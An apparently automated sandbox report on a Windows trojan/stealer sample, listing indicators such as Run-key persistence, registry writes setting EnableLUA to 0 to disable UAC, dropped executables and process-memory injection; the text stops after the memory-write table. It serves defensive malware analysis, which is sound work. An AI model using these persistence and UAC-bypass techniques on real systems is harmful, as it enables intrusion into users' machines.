Malware Analysis Report

2025-08-10 23:07

Sample ID 220210-hn9lasfgel
Target v4vcmk.exe
SHA256 fa5e38ff3f546827c5e62db27f12d68bcc4cb30285a329088c54995b2e4ec5d0
Tags
evasion persistence trojan spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fa5e38ff3f546827c5e62db27f12d68bcc4cb30285a329088c54995b2e4ec5d0

Threat Level: Known bad

The file v4vcmk.exe was found to be: Known bad.

Malicious Activity Summary

evasion persistence trojan spyware stealer

Modifies visibility of file extensions in Explorer

Suspicious use of NtCreateProcessExOtherParentProcess

UAC bypass

Executes dropped EXE

Blocklisted process makes network request

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Checks whether UAC is enabled

Adds Run key to start application

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

System policy modification

Modifies registry key

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-02-10 06:54

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-02-10 06:54

Reported

2022-02-10 06:57

Platform

win10v2004-en-20220113

Max time kernel

168s

Max time network

167s

Command Line

"C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe"

Signatures

Modifies visibility of file extensions in Explorer

evasion

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 3868 created 4836 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\IGMkwoUM\ecEsQUkU.exe
PID 2432 created 3520 N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\QAMQQckI\QMYUIoMs.exe

UAC bypass

evasion trojan

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\fSgEsIQI\dAkcYIYg.exe N/A
N/A N/A C:\ProgramData\WwgMQcMw\LyocAoAM.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dAkcYIYg.exe = "C:\\Users\\Admin\\fSgEsIQI\\dAkcYIYg.exe" C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dAkcYIYg.exe = "C:\\Users\\Admin\\fSgEsIQI\\dAkcYIYg.exe" C:\Users\Admin\fSgEsIQI\dAkcYIYg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LyocAoAM.exe = "C:\\ProgramData\\WwgMQcMw\\LyocAoAM.exe" C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LyocAoAM.exe = "C:\\ProgramData\\WwgMQcMw\\LyocAoAM.exe" C:\ProgramData\WwgMQcMw\LyocAoAM.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ecEsQUkU.exe = "C:\\Users\\Admin\\IGMkwoUM\\ecEsQUkU.exe" C:\Windows\System32\Conhost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QMYUIoMs.exe = "C:\\ProgramData\\QAMQQckI\\QMYUIoMs.exe" C:\Windows\System32\Conhost.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\WinSxS\pending.xml N/A N/A
File opened for modification C:\Windows\Logs\CBS\CBS.log N/A N/A
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log C:\Windows\system32\svchost.exe N/A
File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp C:\Windows\SysWOW64\WerFault.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2644 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Users\Admin\fSgEsIQI\dAkcYIYg.exe
PID 2644 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Users\Admin\fSgEsIQI\dAkcYIYg.exe
PID 2644 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Users\Admin\fSgEsIQI\dAkcYIYg.exe
PID 2644 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\ProgramData\WwgMQcMw\LyocAoAM.exe
PID 2644 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\ProgramData\WwgMQcMw\LyocAoAM.exe
PID 2644 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\ProgramData\WwgMQcMw\LyocAoAM.exe
PID 2644 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 2644 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 2644 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 2644 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 2644 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 2644 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 1656 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 1068 wrote to memory of 1656 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 1068 wrote to memory of 1656 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 1996 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1996 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1996 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1656 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 4008 wrote to memory of 1252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 4008 wrote to memory of 1252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 4008 wrote to memory of 1252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 1656 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1656 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1656 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1656 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1656 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1656 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1656 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1656 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1656 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1656 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2228 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2228 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1252 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1252 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1252 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1252 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1252 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1252 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1252 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1252 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1252 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1252 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1252 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1252 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1252 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1252 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1252 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
